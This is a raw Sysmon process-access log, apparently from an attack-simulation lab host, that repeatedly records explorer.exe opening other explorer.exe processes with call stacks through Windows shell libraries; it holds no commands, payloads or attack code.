16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 